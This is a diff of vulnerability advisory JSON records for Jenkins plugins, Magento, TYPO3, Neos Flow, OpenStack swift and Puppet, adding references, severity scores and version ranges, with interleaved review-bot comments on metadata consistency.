"http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00084.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-665", + "CWE-94" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:22:37Z", + "nvd_published_at": "2019-07-29T18:15:00Z" + } 
+} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-v59p-p692-v382/GHSA-v59p-p692-v382.json b/advisories/github-reviewed/2022/05/GHSA-v59p-p692-v382/GHSA-v59p-p692-v382.json index d5d2778de5c98..cf3a13573d020 100644 --- a/advisories/github-reviewed/2022/05/GHSA-v59p-p692-v382/GHSA-v59p-p692-v382.json +++ b/advisories/github-reviewed/2022/05/GHSA-v59p-p692-v382/GHSA-v59p-p692-v382.json @@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "zendframework/zend-db" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.2.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "zendframework/zend-db" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.3.0" + }, + { + "fixed": "2.3.5" + } + ] + } + ] } ], "references": [ @@ -67,6 +105,14 @@ "type": "WEB", "url": "https://framework.zend.com/security/advisory/ZF2015-02" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zend-db/CVE-2015-0270.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework/CVE-2015-0270.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/zendframework/zendframework" diff --git a/advisories/github-reviewed/2022/05/GHSA-v6xv-rmqc-wcc8/GHSA-v6xv-rmqc-wcc8.json b/advisories/github-reviewed/2022/05/GHSA-v6xv-rmqc-wcc8/GHSA-v6xv-rmqc-wcc8.json index 64ec19f4704c3..8a55febeb2710 100644 --- a/advisories/github-reviewed/2022/05/GHSA-v6xv-rmqc-wcc8/GHSA-v6xv-rmqc-wcc8.json +++ b/advisories/github-reviewed/2022/05/GHSA-v6xv-rmqc-wcc8/GHSA-v6xv-rmqc-wcc8.json @@ -29,10 +29,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 4.5.38" - } + ] }, { "package": { 
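Review bot: The `summary` `"Moby Docker cp broken with debian containers"` in GHSA-v2cv-wwxq-qq97 reads as the title of the linked GitHub issue and describes a breakage symptom, not the vulnerability the `details` field describes (code injection when the nsswitch facility loads a library from inside a chroot holding the container's contents, presumably reached via `docker cp` given the summary). A summary along the lines of `"Docker code injection via nsswitch library loading inside container chroot"` would let the CRITICAL rating and `CWE-94` be understood from the title alone. Summaries in this database surface directly in dependency alerts, so a symptom title here misleads readers about what the alert is for.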
@@ -51,10 +48,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 6.2.8" - } + ] }, { "package": { @@ -73,10 +67,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 7.0.1" - } + ] } ], "references": [ @@ -84,6 +75,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9508" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2014-9508.yaml" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2014-003" + }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-updates/2016-08/msg00106.html" diff --git a/advisories/github-reviewed/2022/05/GHSA-v7mh-3jgf-r26c/GHSA-v7mh-3jgf-r26c.json b/advisories/github-reviewed/2022/05/GHSA-v7mh-3jgf-r26c/GHSA-v7mh-3jgf-r26c.json index 2eee4dbdf1f10..31ba698f650ea 100644 --- a/advisories/github-reviewed/2022/05/GHSA-v7mh-3jgf-r26c/GHSA-v7mh-3jgf-r26c.json +++ b/advisories/github-reviewed/2022/05/GHSA-v7mh-3jgf-r26c/GHSA-v7mh-3jgf-r26c.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v7mh-3jgf-r26c", - "modified": "2023-02-08T17:56:11Z", + "modified": "2024-02-06T16:02:43Z", "published": "2022-05-17T01:42:16Z", "aliases": [ "CVE-2012-4406" @@ -9,7 +9,10 @@ "summary": "OpenStack Object Storage (swift) Code Injection vulnerability", "details": "OpenStack Object Storage (swift) before 1.7.0 uses the loads function in the pickle Python module unsafely when storing and loading metadata in memcached, which allows remote attackers to execute arbitrary code via a crafted pickle object.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { 
@@ -104,9 +107,10 @@ ], "database_specific": { "cwe_ids": [ + "CWE-502", "CWE-94" ], - "severity": "HIGH", + "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2023-02-08T17:56:11Z", "nvd_published_at": "2012-10-22T23:55:00Z" diff --git a/advisories/github-reviewed/2022/05/GHSA-v882-949x-6v28/GHSA-v882-949x-6v28.json b/advisories/github-reviewed/2022/05/GHSA-v882-949x-6v28/GHSA-v882-949x-6v28.json index a7ffdf649c838..a3a6e1ef767d1 100644 --- a/advisories/github-reviewed/2022/05/GHSA-v882-949x-6v28/GHSA-v882-949x-6v28.json +++ b/advisories/github-reviewed/2022/05/GHSA-v882-949x-6v28/GHSA-v882-949x-6v28.json @@ -44,6 +44,10 @@ "type": "WEB", "url": "https://github.com/simplesamlphp/simplesamlphp/commit/b72c79e3070f930d758f5c269333d63ed7509e2e" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/simplesamlphp/simplesamlphp/CVE-2017-12872.yaml" + }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2017/12/msg00007.html" diff --git a/advisories/github-reviewed/2022/05/GHSA-v8fg-p27h-mxjp/GHSA-v8fg-p27h-mxjp.json b/advisories/github-reviewed/2022/05/GHSA-v8fg-p27h-mxjp/GHSA-v8fg-p27h-mxjp.json index ff24b08f9060b..e54970e08c01a 100644 --- a/advisories/github-reviewed/2022/05/GHSA-v8fg-p27h-mxjp/GHSA-v8fg-p27h-mxjp.json +++ b/advisories/github-reviewed/2022/05/GHSA-v8fg-p27h-mxjp/GHSA-v8fg-p27h-mxjp.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8147" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8147.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" 
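Review bot: This hunk bumps `severity` to `"CRITICAL"` and adds `"CWE-502"` to match the newly added 9.8 vector and the pickle-deserialization details, but leaves `"github_reviewed_at": "2023-02-08T17:56:11Z"` in place even though the first hunk of this file moved `modified` to `2024-02-06T16:02:43Z`. The new files in this diff set `github_reviewed_at` to (within a second of) `modified`, so if this change was a curator re-review the timestamp should move too; if the convention is that only the original review date is recorded, the stale value is fine and a word in the commit message would settle it.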
diff --git a/advisories/github-reviewed/2022/05/GHSA-v99w-jxr4-w6mc/GHSA-v99w-jxr4-w6mc.json b/advisories/github-reviewed/2022/05/GHSA-v99w-jxr4-w6mc/GHSA-v99w-jxr4-w6mc.json index 1bafb8c4d3468..939c131bb133c 100644 --- a/advisories/github-reviewed/2022/05/GHSA-v99w-jxr4-w6mc/GHSA-v99w-jxr4-w6mc.json +++ b/advisories/github-reviewed/2022/05/GHSA-v99w-jxr4-w6mc/GHSA-v99w-jxr4-w6mc.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8117" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8117.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-vc2v-34c4-vg9c/GHSA-vc2v-34c4-vg9c.json b/advisories/github-reviewed/2022/05/GHSA-vc2v-34c4-vg9c/GHSA-vc2v-34c4-vg9c.json new file mode 100644 index 0000000000000..9412c7577cff8 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-vc2v-34c4-vg9c/GHSA-vc2v-34c4-vg9c.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vc2v-34c4-vg9c", + "modified": "2024-01-30T22:00:30Z", + "published": "2022-05-13T01:17:42Z", + "aliases": [ + "CVE-2019-1003088" + ], + "summary": "Jenkins Fabric-beta-publisher Plugin stores credentials in plain text", + "details": "Jenkins Fabric Beta Publisher Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "egor-n:fabric-beta-publisher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003088" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1043" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-311" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:00:21Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-vc74-c4m6-9979/GHSA-vc74-c4m6-9979.json b/advisories/github-reviewed/2022/05/GHSA-vc74-c4m6-9979/GHSA-vc74-c4m6-9979.json index 3f49eea355ed0..0509081766b67 100644 --- a/advisories/github-reviewed/2022/05/GHSA-vc74-c4m6-9979/GHSA-vc74-c4m6-9979.json +++ b/advisories/github-reviewed/2022/05/GHSA-vc74-c4m6-9979/GHSA-vc74-c4m6-9979.json 
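Review bot: This advisory assigns `"CWE-311"` to credentials stored unencrypted in job `config.xml`, while GHSA-r5jr-82x4-r6j7 earlier in this diff assigns `"CWE-522"` to the same weakness class (credentials stored unencrypted in the global `config.xml`) with an otherwise identical CVSS vector and the same MODERATE rating. Pick one classification for the Jenkins plain-text credential storage family so the two entries do not diverge; CWE-522 (insufficiently protected credentials) is the more specific of the two.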
@@ -12,6 +12,44 @@ ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "neos/flow" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.1.0" + }, + { + "fixed": "1.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "neos/flow" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.0.1" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -22,7 +60,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.1" + "introduced": "1.1.0" }, { "fixed": "1.1.1" @@ -41,7 +79,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.0" + "introduced": "2.0.0" }, { "fixed": "2.0.1" @@ -60,6 +98,18 @@ "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89614" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/neos/flow/CVE-2013-7082.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/flow/CVE-2013-7082.yaml" + }, + { + "type": "WEB", + "url": "https://www.neos.io/blog/flow-sa-2013-001.html" + }, { "type": "WEB", "url": "http://osvdb.org/100825" diff --git a/advisories/github-reviewed/2022/05/GHSA-vccp-5v5h-p8m6/GHSA-vccp-5v5h-p8m6.json b/advisories/github-reviewed/2022/05/GHSA-vccp-5v5h-p8m6/GHSA-vccp-5v5h-p8m6.json index 1c31f298c3d96..e1166cfea6207 100644 --- a/advisories/github-reviewed/2022/05/GHSA-vccp-5v5h-p8m6/GHSA-vccp-5v5h-p8m6.json +++ b/advisories/github-reviewed/2022/05/GHSA-vccp-5v5h-p8m6/GHSA-vccp-5v5h-p8m6.json @@ -29,10 +29,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 6.2.2" - } + ] } ], "references": [ 
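Review bot: The first hunk adds `neos/flow` ranges `1.1.0`–`1.1.1` and `2.0.0`–`2.0.1` that mirror the existing entries, but `neos/flow` is the renamed successor of `typo3/flow` and, as far as I know, did not publish releases in the 1.x or 2.x series, so these ranges would never match an installed version; please verify against Packagist before merging and drop them if no such releases exist. Normalising `"1.1"`/`"2.0"` to three-component versions in the later hunks is a good change, since mixed-length version strings are a common source of comparison surprises in ECOSYSTEM ranges. The enclosing `affected` array continues past the visible hunks.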
@@ -40,6 +37,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-3946" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2014-3946.yaml" + }, + { + "type": "WEB", + "url": "https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2014-001/" + }, { "type": "WEB", "url": "http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2014-001/" diff --git a/advisories/github-reviewed/2022/05/GHSA-vcgj-j8c5-2h52/GHSA-vcgj-j8c5-2h52.json b/advisories/github-reviewed/2022/05/GHSA-vcgj-j8c5-2h52/GHSA-vcgj-j8c5-2h52.json new file mode 100644 index 0000000000000..f40872dc32dcd --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-vcgj-j8c5-2h52/GHSA-vcgj-j8c5-2h52.json 
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vcgj-j8c5-2h52", + "modified": "2024-01-30T22:46:41Z", + "published": "2022-05-13T01:36:52Z", + "aliases": [ + "CVE-2017-2649" + ], + "summary": "Jenkins Active Directory Plugin did not verify certificate of AD server", + "details": "It was found that the Active Directory Plugin for Jenkins up to and including version 2.2 did not verify certificates of the Active Directory server, thereby enabling Man-in-the-Middle attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:active-directory" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.2" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2649" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-03-20/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/96986" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:46:41Z", + "nvd_published_at": "2018-07-27T20:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-vf2c-w49g-3xf3/GHSA-vf2c-w49g-3xf3.json b/advisories/github-reviewed/2022/05/GHSA-vf2c-w49g-3xf3/GHSA-vf2c-w49g-3xf3.json new file mode 100644 index 0000000000000..8343577d9bcf1 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-vf2c-w49g-3xf3/GHSA-vf2c-w49g-3xf3.json 
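Review bot: This new file carries both a `fixed` event (`"2.3"`) and a `database_specific.last_known_affected_version_range` of `"<= 2.2"`, which is the redundant pattern this same diff removes from GHSA-r6fv-56gp-j3r4, GHSA-v6xv-rmqc-wcc8 and GHSA-vccp-5v5h-p8m6; GHSA-vhh3-mvc4-hhq6 later in the diff (`fixed` `"0.13"` with `"<= 0.12"`) has the same shape. If the rule is that `last_known_affected_version_range` is kept only when no `fixed` event exists, both new files should drop the `database_specific` block on the affected entry; otherwise the removals elsewhere in the diff need a different justification.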
@@ -0,0 +1,61 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-vf2c-w49g-3xf3",
+ "modified": "2024-01-30T23:19:08Z",
+ "published": "2022-05-24T16:52:46Z",
+ "aliases": [
+ "CVE-2019-10387"
+ ],
+ "summary": "Missing permission check in Jenkins XL TestView Plugin",
+ "details": "A missing permission check in Jenkins XL TestView Plugin 1.2.0 and earlier in XLTestView.XLTestDescriptor#doTestConnection allows users with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "com.xebialabs.xlt.ci:xltestview-plugin"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "1.2.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10387"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1008"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T23:19:08Z",
+ "nvd_published_at": "2019-08-07T15:15:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-vhh3-mvc4-hhq6/GHSA-vhh3-mvc4-hhq6.json b/advisories/github-reviewed/2022/05/GHSA-vhh3-mvc4-hhq6/GHSA-vhh3-mvc4-hhq6.json
new file mode 100644
index 0000000000000..60a47ba037c84
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-vhh3-mvc4-hhq6/GHSA-vhh3-mvc4-hhq6.json
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-vhh3-mvc4-hhq6",
+ "modified": "2024-01-30T22:03:41Z",
+ "published": "2022-05-13T01:18:20Z",
+ "aliases": [
+ "CVE-2017-1000388"
+ ],
+ "summary": "Jenkins Dependency Graph Viewer plugin vulnerable to missing permission checks",
+ "details": "Jenkins Dependency Graph Viewer plugin 0.12 and earlier did not perform permission checks for the API endpoint that modifies the dependency graph, allowing anyone with Overall/Read permission to modify this data.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:depgraph-view"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.13"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 0.12"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000388"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2017-10-23/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T22:03:41Z",
+ "nvd_published_at": "2018-01-26T02:29:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-vpg9-gq7j-mxqg/GHSA-vpg9-gq7j-mxqg.json b/advisories/github-reviewed/2022/05/GHSA-vpg9-gq7j-mxqg/GHSA-vpg9-gq7j-mxqg.json
index ae3ce22e65667..6a6d18e2168ff 100644
--- a/advisories/github-reviewed/2022/05/GHSA-vpg9-gq7j-mxqg/GHSA-vpg9-gq7j-mxqg.json
+++ b/advisories/github-reviewed/2022/05/GHSA-vpg9-gq7j-mxqg/GHSA-vpg9-gq7j-mxqg.json
@@ -40,10 +40,18 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8144"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8144.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/magento/magento2"
 },
+ {
+ "type": "WEB",
+ "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
+ },
 {
 "type": "WEB",
 "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
diff --git a/advisories/github-reviewed/2022/05/GHSA-vrh7-99jh-3fmm/GHSA-vrh7-99jh-3fmm.json b/advisories/github-reviewed/2022/05/GHSA-vrh7-99jh-3fmm/GHSA-vrh7-99jh-3fmm.json
new file mode 100644
index 0000000000000..e321171637419
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-vrh7-99jh-3fmm/GHSA-vrh7-99jh-3fmm.json
@@ -0,0 +1,117 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-vrh7-99jh-3fmm",
+ "modified": "2024-02-06T22:38:26Z",
+ "published": "2022-05-02T06:10:33Z",
+ "aliases": [
+ "CVE-2010-0156"
+ ],
+ "summary": "Puppet arbitrary files overwrite via a symlink attack",
+ "details": "Puppet 0.24.x before 0.24.9 and 0.25.x before 0.25.2 allows local users to overwrite arbitrary files via a symlink attack on the (1) /tmp/daemonout, (2) /tmp/puppetdoc.txt, (3) /tmp/puppetdoc.tex, or (4) /tmp/puppetdoc.aux temporary file.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "RubyGems",
+ "name": "puppet"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0.24.0"
+ },
+ {
+ "fixed": "0.24.9"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "RubyGems",
+ "name": "puppet"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0.25.0"
+ },
+ {
+ "fixed": "0.25.2"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-0156"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/puppetlabs/puppet/commit/0aae57f91dc69b22fb674f8de3a13c22edd07128"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/puppetlabs/puppet/commit/6111ba80f2c6f6d1541af971f565119e6e03d77d"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=502881"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/puppetlabs/puppet"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puppet/CVE-2010-0156.yml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://puppet.com/security/cve/cve-2010-0156"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20100316113904/http://secunia.com/advisories/38766"
+ },
+ {
+ "type": "WEB",
+ "url": "http://groups.google.com/group/puppet-announce/browse_thread/thread/4401823f6cbf6087"
+ },
+ {
+ "type": "WEB",
+ "url": "http://groups.google.com/group/puppet-announce/browse_thread/thread/73cd1b2896d986c2"
+ },
+ {
+ "type": "WEB",
+ "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/036083.html"
+ },
+ {
+ "type": "WEB",
+ "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/036166.html"
+ },
+ {
+ "type": "WEB",
+ "url": "http://lists.opensuse.org/opensuse-security-announce/2010-06/msg00001.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-59"
+ ],
+ "severity": "LOW",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-06T22:38:26Z",
+ "nvd_published_at": "2010-03-03T19:30:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-vv4q-2w98-4v8g/GHSA-vv4q-2w98-4v8g.json b/advisories/github-reviewed/2022/05/GHSA-vv4q-2w98-4v8g/GHSA-vv4q-2w98-4v8g.json
new file mode 100644
index 0000000000000..6238a75790302
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-vv4q-2w98-4v8g/GHSA-vv4q-2w98-4v8g.json
@@ -0,0 +1,64 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-vv4q-2w98-4v8g",
+ "modified": "2024-01-30T21:18:34Z",
+ "published": "2022-05-24T22:00:44Z",
+ "aliases": [
+ "CVE-2019-10427"
+ ],
+ "summary": "Jenkins Aqua MicroScanner Plugin showed plain text credential in configuration form ",
+ "details": "Jenkins Aqua MicroScanner Plugin 1.0.7 and earlier transmitted configured credentials in plain text as part of the global Jenkins configuration form, potentially resulting in their exposure.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:aqua-microscanner"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.0.8"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1.0.7"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10427"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1507"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-319"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T21:18:34Z",
+ "nvd_published_at": "2019-09-25T16:15:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-vx7m-v8v2-fhwm/GHSA-vx7m-v8v2-fhwm.json b/advisories/github-reviewed/2022/05/GHSA-vx7m-v8v2-fhwm/GHSA-vx7m-v8v2-fhwm.json
index 7d0f04b0d98ee..325087eba45eb 100644
--- a/advisories/github-reviewed/2022/05/GHSA-vx7m-v8v2-fhwm/GHSA-vx7m-v8v2-fhwm.json
+++ b/advisories/github-reviewed/2022/05/GHSA-vx7m-v8v2-fhwm/GHSA-vx7m-v8v2-fhwm.json
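Review bot: The `summary` value ends with a trailing space (`"...credential in configuration form "`), which surfaces in rendered titles and defeats exact-match comparison with other advisory mirrors; it should be trimmed to `"summary": "Jenkins Aqua MicroScanner Plugin showed plain text credential in configuration form",`. The same trailing space appears in the summaries of the new GHSA-w55x-q3gv-px85, GHSA-wmq3-24jm-m8xh and GHSA-wwrr-4jp4-58wg files further down this diff, so it looks like the generator is not trimming the field on import.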
@@ -59,10 +59,18 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8131"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8131.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/magento/magento2"
 },
+ {
+ "type": "WEB",
+ "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
+ },
 {
 "type": "WEB",
 "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
diff --git a/advisories/github-reviewed/2022/05/GHSA-w2xx-jp9f-gp8g/GHSA-w2xx-jp9f-gp8g.json b/advisories/github-reviewed/2022/05/GHSA-w2xx-jp9f-gp8g/GHSA-w2xx-jp9f-gp8g.json
index cfdf7b044a2e3..8d1af92b210fc 100644
--- a/advisories/github-reviewed/2022/05/GHSA-w2xx-jp9f-gp8g/GHSA-w2xx-jp9f-gp8g.json
+++ b/advisories/github-reviewed/2022/05/GHSA-w2xx-jp9f-gp8g/GHSA-w2xx-jp9f-gp8g.json
@@ -37,6 +37,10 @@
